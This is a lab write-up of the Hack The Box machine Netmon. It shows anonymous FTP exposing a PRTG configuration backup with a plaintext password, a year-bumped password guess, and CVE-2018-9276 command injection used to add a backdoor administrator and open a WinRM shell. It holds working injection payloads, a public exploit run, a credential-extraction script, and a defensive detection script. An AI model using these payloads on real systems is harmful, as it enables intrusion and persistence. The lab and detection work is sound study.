Netmon
Netmon is one of the most instructive machines in the Easy tier because it demonstrates something that pure exploit-focused machines don't: sensitive data exposure through a misconfigured service is often more dangerous than unpatched software. The entire initial foothold comes from reading a configuration backup over anonymous FTP, no exploit required. The credential recovered from that backup (after a small mutation) unlocks a network monitoring platform with an authenticated RCE (CVE-2018-9276), which is abused to create a backdoor local administrator and land a WinRM shell with a full administrator token. It's a realistic credential theft -> platform abuse chain that mirrors real-world incidents. Netmon also shows the same vulnerability exploited two ways: manually through the PRTG notification system, and with a public exploit script. Both are documented here.
| Machine | Netmon |
|---|---|
| Difficulty | Easy |
| OS | Windows |
| Released on | 2nd March, 2019 |
| Created by | mrb3n8132 |
Attack Chain
```
Nmap → FTP (anonymous, C:\ root) + HTTP (PRTG 18.1.37.13946) + WinRM (5985)
→ FTP: navigate to ProgramData\Paessler\PRTG Network Monitor\
→ Download PRTG Configuration.old.bak (Jul 2018)
→ Extract plaintext creds: prtgadmin:PrTg@dmin2018
→ Login fails → timestamp analysis → year increment
→ prtgadmin:PrTg@dmin2019 → PRTG admin access
→ CVE-2018-9276: Notification parameter injection
→ Pipe injection → SYSTEM-level command execution
→ net user htb / pentest → localgroup administrators
→ nxc confirms Pwn3d! → Evil-WinRM session
→ whoami → BUILTIN\Administrators (High IL)
→ root.txt (Administrator\Desktop)
```
Reconnaissance
```
Nmap scan report for 10.129.230.176
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2026-06-11 22:50:38 EAT for 1044s
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 13307/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41646/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17884/udp): CLEAN (Failed to receive data)
| Check 4 (port 53350/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2026-06-11T20:07:52
|_ start_date: 2026-06-11T19:46:29
```
The scan shows two high-value findings.
- First, anonymous FTP is enabled, and the directory listing reveals the entire C:\ drive. The FTP root is mapped to the filesystem root, so you can browse Users, Windows, Program Files and inetpub without any credentials.
- Second, port 80 is running PRTG Network Monitor version 18.1.37.13946, a network management platform by Paessler. The exact build is advertised in the HTTP Server header (PRTG/18.1.37.13946) and in nmap's service banner, so an attacker knows what they are up against before sending a single authenticated request.

WinRM (5985) is also open, which matters once we hold an administrator credential.

Grab the user flag from C:\Users\Public\Desktop\user.txt. It is readable over anonymous FTP, so the user flag falls before any authentication:
```
➜ ftp 10.129.18.14 21
Connected to 10.129.18.14.
220 Microsoft FTP Service
Name (10.129.18.14:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
229 Entering Extended Passive Mode (|||49745|)
125 Data connection already open; Transfer starting.
11-20-16 10:46PM <DIR> $RECYCLE.BIN
02-03-19 12:18AM 1024 .rnd
11-20-16 09:59PM 389408 bootmgr
07-16-16 09:10AM 1 BOOTNXT
02-03-19 08:05AM <DIR> Documents and Settings
02-25-19 10:15PM <DIR> inetpub
06-13-26 11:23AM 738197504 pagefile.sys
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
12-15-21 10:40AM <DIR> ProgramData
02-03-19 08:05AM <DIR> Recovery
02-03-19 08:04AM <DIR> System Volume Information
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49752|)
150 Opening ASCII mode data connection.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49758|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
06-13-26 11:24AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49761|)
150 Opening ASCII mode data connection.
100% |**************************************************************************************************************************| 34 0.19 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.18 KiB/s)
ftp>
```
Credential Discovery - PRTG Configuration Backup via FTP
PRTG stores its entire configuration (sensors, devices, users, credentials, everything) in XML files under ProgramData\Paessler\PRTG Network Monitor\. Since the FTP root is C:\, you can navigate directly there:
```
➜ ftp 10.129.230.176 21
Connected to 10.129.230.176.
220 Microsoft FTP Service
Name (10.129.230.176:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
229 Entering Extended Passive Mode (|||49910|)
150 Opening ASCII mode data connection.
11-20-16 10:46PM <DIR> $RECYCLE.BIN
02-03-19 12:18AM 1024 .rnd
11-20-16 09:59PM 389408 bootmgr
07-16-16 09:10AM 1 BOOTNXT
02-03-19 08:05AM <DIR> Documents and Settings
02-25-19 10:15PM <DIR> inetpub
06-11-26 03:46PM 738197504 pagefile.sys
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
12-15-21 10:40AM <DIR> ProgramData
02-03-19 08:05AM <DIR> Recovery
02-03-19 08:04AM <DIR> System Volume Information
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49911|)
150 Opening ASCII mode data connection.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49917|)
125 Data connection already open; Transfer starting.
06-11-26 03:57PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49989|)
125 Data connection already open; Transfer starting.
06-11-26 03:57PM <DIR> Configuration Auto-Backups
06-11-26 03:57PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
06-11-26 03:57PM <DIR> Logs (Web Server)
06-11-26 03:57PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
06-11-26 03:57PM 1641470 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
```
The directory listing reveals three files of interest: PRTG Configuration.dat, PRTG Configuration.old and PRTG Configuration.old.bak.

The timestamps here are significant. The .dat and .old files are both from February 2019 (the current configuration; they have identical sizes and timestamps, so one is a copy of the other). The .old.bak file is from July 2018, a full seven months earlier.

Backup files are valuable in a penetration test because they often contain credentials that were valid at backup time and may have been reused, slightly modified, or simply forgotten about. 😉

Download the backup:
```
ftp> get PRTG\ Configuration.old.bak
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50034|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 1126 KiB 261.
226 Transfer complete.
1153755 bytes received in 00:04 (261.00 KiB/s)
ftp> exit
221 Goodbye.
➜ file PRTG\ Configuration.old.bak
PRTG Configuration.old.bak: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (749)
```
The file is an XML document. Search it for credentials:
```
➜ cat PRTG\ Configuration.old.bak | grep -A3 "dbpassword"
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
60
</dbtimeout>
```
The backup hands over the prtgadmin username and password in plaintext. In this PRTG build the configuration file stores the credential unencrypted for use by the monitoring engine, and every configuration backup inherits it, so a world-readable backup is as good as the live config. The "User:" XML comment inside the element is what ties the password to the account.
The Password Mutation - A Critical Thinking Moment
Navigating to http://10.129.230.176 confirms a PRTG login page. Trying the universal default credentials (prtgadmin:prtgadmin) fails immediately.

I then tried the recovered prtgadmin:PrTg@dmin2018, and it fails too. The reason is visible in the file timestamps if you pay attention: the backup is from July 2018, but the current configuration files are from February 2019. The password embeds a year, so the obvious mutation is to bump it to the current one; someone rotated it for the new year.

prtgadmin:PrTg@dmin2019 logs in successfully.
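The two steps above (pulling secrets out of the backup, then deriving the year-rotated guess) are easy to do by hand once, and worth scripting when the config is a megabyte of XML with more than one credential in it. The block below is an added example for this writeup, not code from the page or from Paessler. The XML in it is a constructed sample shaped like the grep hit above (a `<dbpassword>` element carrying a "User:" comment); the `<dbuser>` sibling and the `<snmpcommv2>` element are assumptions about the real file's layout, included only to show the parser handling more than one kind of secret.

```python
"""Pull credentials out of a PRTG configuration backup and derive the
year-rotated candidates to try next.

Added example for the Netmon writeup, not code from the page or from
Paessler. The XML below is a constructed sample; the <dbuser> sibling and
the <snmpcommv2> element are assumptions about the real file's layout.
"""
import codecs
import re
import xml.etree.ElementTree as ET

# Constructed sample, UTF-8 with BOM like the real backup reported by file(1).
SAMPLE_CONFIG = codecs.BOM_UTF8 + b"""<?xml version="1.0" encoding="UTF-8"?>
<data>
  <dbcredentials>
    <dbauth>1</dbauth>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <dbtimeout>60</dbtimeout>
    <dbuser>prtgadmin</dbuser>
  </dbcredentials>
  <snmp>
    <snmpcommv2>public</snmpcommv2>
  </snmp>
</data>
"""

# Element names that usually carry a secret in monitoring-tool configs.
SECRET_TAG_RE = re.compile(r"password|passwd|secret|snmpcomm|community", re.I)


def find_credentials(raw: bytes):
    """Return (tag, user, secret) triples for every secret-bearing element.

    Comments are kept during parsing because PRTG writes the owning user as
    an XML comment inside the element, exactly as the grep output showed.
    """
    if raw.startswith(codecs.BOM_UTF8):
        raw = raw[len(codecs.BOM_UTF8):]
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(raw, parser=parser)
    parents = {child: parent for parent in root.iter() for child in parent}

    found = []
    for elem in root.iter():
        if not isinstance(elem.tag, str) or not SECRET_TAG_RE.search(elem.tag):
            continue
        # The value may sit after a comment node, so gather text and tails.
        secret = "".join([elem.text or ""] + [(c.tail or "") for c in elem]).strip()
        if not secret:
            continue
        user = None
        for c in elem:  # "<!-- User: prtgadmin -->" style comment
            if c.tag is ET.Comment and c.text and c.text.strip().lower().startswith("user:"):
                user = c.text.split(":", 1)[1].strip()
        if user is None:  # fall back to a sibling such as <dbuser> (assumed layout)
            for sib in parents.get(elem, []):
                if isinstance(sib.tag, str) and sib.tag.lower().endswith("user") and sib.text:
                    user = sib.text.strip()
        found.append((elem.tag, user, secret))
    return found


YEAR_RE = re.compile(r"(?<!\d)(?:19|20)\d{2}(?!\d)")


def year_mutations(password: str, through_year: int):
    """Bump a four-digit year embedded in a leaked password.

    A backup from 2018 whose live config is from 2019 suggests one rotation;
    every year between the two is generated so an intermediate one is not missed.
    """
    m = YEAR_RE.search(password)
    if not m:
        return []
    first = int(m.group()) + 1
    return [password[:m.start()] + str(y) + password[m.end():]
            for y in range(first, through_year + 1)]


if __name__ == "__main__":
    for tag, user, secret in find_credentials(SAMPLE_CONFIG):
        print(f"{tag:12} user={user!r} value={secret!r}")
        for cand in year_mutations(secret, 2019):
            print(f"{'':12} try -> {cand}")
```

Run it against the real backup with `find_credentials(open("PRTG Configuration.old.bak", "rb").read())`; the BOM handling and comment-aware parsing are the two details that trip up a naive `grep`/ElementTree pass on this file.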
Foothold - PRTG Command Injection (CVE-2018-9276)
Now authenticated to PRTG as administrator, the next step is leveraging the platform for code execution. PRTG 18.1.37.13946 has a well-documented authenticated RCE, CVE-2018-9276: the Parameter field of an Execute Program notification is passed unsanitized into the PowerShell command line that runs the selected script. A pipe character followed by arbitrary commands is therefore executed by the PRTG core service, which runs as LocalSystem by default, so anyone holding a PRTG administrator session gets SYSTEM on the host.
Path 1 - Manual Exploitation
This path is worth understanding because it shows exactly what the vulnerability is doing mechanically.
Navigate to Setup -> Account Settings -> Notifications and create a new notification:
- Click Add new notification and give it a name (here, Ping).
- Scroll to Execute Program and enable it.
- Set Program File to Demo exe notification - outfile.ps1, one of the demo scripts that ships with PRTG.
- In the Parameter field, enter the command injection payload:

```
Test | ping -n 4 10.10.15.192
```
Save the notification. Before triggering it, start an ICMP listener on the VPN interface, then click the notification's bell icon to trigger it immediately. Echo requests arriving from the target confirm that the PRTG service ran the injected command:

```
➜ sudo tcpdump -i tun0 ip proto \\icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:50:44.592941 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 772, length 40
18:50:44.596653 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 772, length 40
18:50:45.605729 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 773, length 40
18:50:45.605770 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 773, length 40
18:50:46.621647 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 774, length 40
18:50:46.621706 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 774, length 40
18:50:47.637829 IP 10.129.18.14 > 10.10.15.192: ICMP echo request, id 1, seq 775, length 40
18:50:47.637856 IP 10.10.15.192 > 10.129.18.14: ICMP echo reply, id 1, seq 775, length 40
```

Code execution confirmed, and because the PRTG core service runs as SYSTEM, so did the ping.
Now swap the ping for something useful. I opted to create a backdoor local administrator (in PowerShell the semicolon separates the two statements, so both run from a single notification):

```
test.txt | net user htb abc123! /add ; net localgroup administrators htb /add
```
Save and trigger again. Verify the account was created:

```
➜ nxc smb 10.129.18.14 -u 'htb' -p 'abc123!'
SMB 10.129.18.14 445 NETMON [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB 10.129.18.14 445 NETMON [+] netmon\htb:abc123! (Pwn3d!)
➜ nxc winrm 10.129.18.14 -u 'htb' -p 'abc123!'
WINRM 10.129.18.14 5985 NETMON [*] Windows 10 / Server 2016 Build 14393 (name:NETMON) (domain:netmon)
WINRM 10.129.18.14 5985 NETMON [+] netmon\htb:abc123! (Pwn3d!)
```
Connect with Evil-WinRM:

```
➜ evil-winrm -i 10.129.18.14 -u 'htb' -p 'abc123!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\htb\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
netmon\htb S-1-5-21-2105491204-2789866987-2357151585-1015
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\htb\Documents> type ..\..\Administrator\Desktop\root.txt
5c65846bb9da09af1a91a1648e70a1d4
```
whoami /all confirms BUILTIN\Administrators membership with a full, unfiltered administrator token: SeDebugPrivilege, SeImpersonatePrivilege, SeTakeOwnershipPrivilege and the rest of the High Mandatory Level set (the High label on a network logon of a non-built-in local admin means UAC token filtering is not getting in the way here). Note that this shell runs as the htb user, not SYSTEM; the SYSTEM context belonged to the PRTG notification that created the account. With SeDebugPrivilege in hand, stepping up to SYSTEM is routine if it is ever needed, but the root flag does not require it.
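From the defender's side, the chain just walked leaves a distinctive shape in process-creation telemetry: the PRTG core service, running as SYSTEM, spawns a shell with a pipe in its arguments, and that shell spawns account-management binaries. The block below is an added example for this writeup, not code from the page or from Paessler: a small hunting routine run over constructed Sysmon-Event-ID-1-style records. The lineage it assumes (PRTG Server.exe -> powershell.exe -> net.exe), the PRTG binary names and the notification script path are assumptions about how the Execute Program notification runs; confirm them against your own Sysmon or Security 4688 data before relying on the rule.

```python
"""Hunt for CVE-2018-9276-style notification abuse in process-creation logs.

Added example for the Netmon writeup, not code from the page. The events are
constructed; the process lineage, PRTG binary names and script path are
assumptions to be validated against real telemetry.
"""
import ntpath
import re
from typing import Dict, List

# Assumed: the PRTG core/probe service binaries (run as LocalSystem by default).
PRTG_IMAGES = {"prtg server.exe", "prtg probe.exe"}
# Children a notification runner has no business spawning.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
LOLBINS = {"net.exe", "net1.exe", "whoami.exe", "ping.exe", "certutil.exe"}
# The persistence step used on this box: local user / Administrators changes.
PERSISTENCE_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)",
    re.IGNORECASE,
)

# Constructed sample events, one dict per process start (flattened Sysmon ID 1 fields).
EVENTS: List[Dict] = [
    {"pid": 1200, "ppid": 600, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe",
     "cmdline": r'"C:\Program Files (x86)\PRTG Network Monitor\PRTG Server.exe"'},
    # The notification fires: script name and injected parameter travel together.
    {"pid": 3100, "ppid": 1200, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -File "C:\Program Files (x86)\PRTG Network Monitor\Notifications\EXE\Demo exe notification - outfile.ps1" test.txt | net user htb abc123! /add ; net localgroup administrators htb /add'},
    {"pid": 3104, "ppid": 3100, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net user htb abc123! /add"},
    {"pid": 3108, "ppid": 3100, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net localgroup administrators htb /add"},
    # Benign: an administrator listing the group interactively is not PRTG abuse.
    {"pid": 4200, "ppid": 900, "user": "NETMON\\Administrator",
     "image": r"C:\Windows\System32\net.exe", "cmdline": r"net localgroup administrators"},
]


def prtg_ancestor(event: Dict, by_pid: Dict[int, Dict], max_depth: int = 4):
    """Walk up the parent chain and return the PRTG process if one is found.

    Keyed on PID only, so PID reuse over long windows would need a start-time
    or ProcessGuid check in production; fine for a single batch like this.
    """
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return None
        if ntpath.basename(cur["image"]).lower() in PRTG_IMAGES:
            return cur
    return None


def hunt(events: List[Dict]) -> List[Dict]:
    """Return an alert for each process that descends from PRTG and looks abusive."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if prtg_ancestor(e, by_pid) is None:
            continue
        image = ntpath.basename(e["image"]).lower()
        reasons = []
        if image in SHELL_IMAGES and "|" in e["cmdline"]:
            reasons.append("shell spawned by PRTG with a pipe in its arguments")
        if image in LOLBINS:
            reasons.append(f"{image} spawned under PRTG")
        if PERSISTENCE_RE.search(e["cmdline"]):
            reasons.append("local account/group change from PRTG lineage")
        if reasons:
            alerts.append({"pid": e["pid"], "user": e["user"],
                           "cmdline": e["cmdline"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(f"pid={a['pid']} user={a['user']}")
        print(f"  {a['cmdline']}")
        for r in a["reasons"]:
            print(f"  - {r}")
```

The pipe check is deliberately narrow: a notification that legitimately runs a script still produces a powershell.exe child of the PRTG service, so the signal is the shell metacharacter in the arguments and the LOLBIN grandchildren, not the PowerShell launch itself. Pair it with Security events 4720 and 4732 (user created, member added to Administrators) where the subject is SYSTEM to corroborate.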
Path 2 - Automated Exploit (CVE-2018-9276)
The same vulnerability has a public exploit script on Exploit-DB:

```
➜ searchsploit PRTG
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
➜ searchsploit -m 46527.sh
Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46527
Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
Codes: CVE-2018-9276
Verified: False
File Type: Bourne-Again shell script, ASCII text executable, with very long lines (2429)
Copied to: /home/kali/Desktop/Machine/HTB/Netmon/46527.sh
```
The script automates the notification injection chain, but it does not log in by itself: as its banner says, you authenticate in the browser first and hand it the session cookie with -c. Only the OCTOPUS1813713946 cookie is the PRTG session (the name is OCTOPUS followed by the build number with the dots removed); the _ga, _gid and _gat values in the string below are Google Analytics cookies copied along from the browser and are irrelevant. With the cookie it creates a notification carrying an injected payload and triggers it three times (drop a marker file, create the user with its password, add it to Administrators), then reports success:
```
➜ bash 46527.sh -u http://10.129.230.176 -c "_ga=GA1.4.452263986.1781207512; _gid=GA1.4.1228910563.1781207512; OCTOPUS1813713946=e0NFQzJFQzZBLUE5MDItNDM0My05OTZELUU2NjI5MjU5MzI4Mn0%3D; _gat=1"
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: https://www.codewatch.org/blog/?p=453 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
```
Verify and connect:

```
➜ nxc smb 10.129.230.176 -u 'pentest' -p 'P3nT3st!' --shares ADMIN$
SMB 10.129.230.176 445 NETMON [*] Windows Server 2016 Standard 14393 x64 (name:NETMON) (domain:netmon) (signing:False) (SMBv1:True)
SMB 10.129.230.176 445 NETMON [+] netmon\pentest:P3nT3st! (Pwn3d!)
SMB 10.129.230.176 445 NETMON [*] Enumerated shares
SMB 10.129.230.176 445 NETMON Share Permissions Remark
SMB 10.129.230.176 445 NETMON ----- ----------- ------
➜ nxc winrm 10.129.230.176 -u 'pentest' -p 'P3nT3st!'
WINRM 10.129.230.176 5985 NETMON [*] Windows 10 / Server 2016 Build 14393 (name:NETMON) (domain:netmon)
WINRM 10.129.230.176 5985 NETMON [+] netmon\pentest:P3nT3st! (Pwn3d!)
➜ evil-winrm -i 10.129.230.176 -u 'pentest' -p 'P3nT3st!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
netmon\pentest S-1-5-21-2105491204-2789866987-2357151585-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
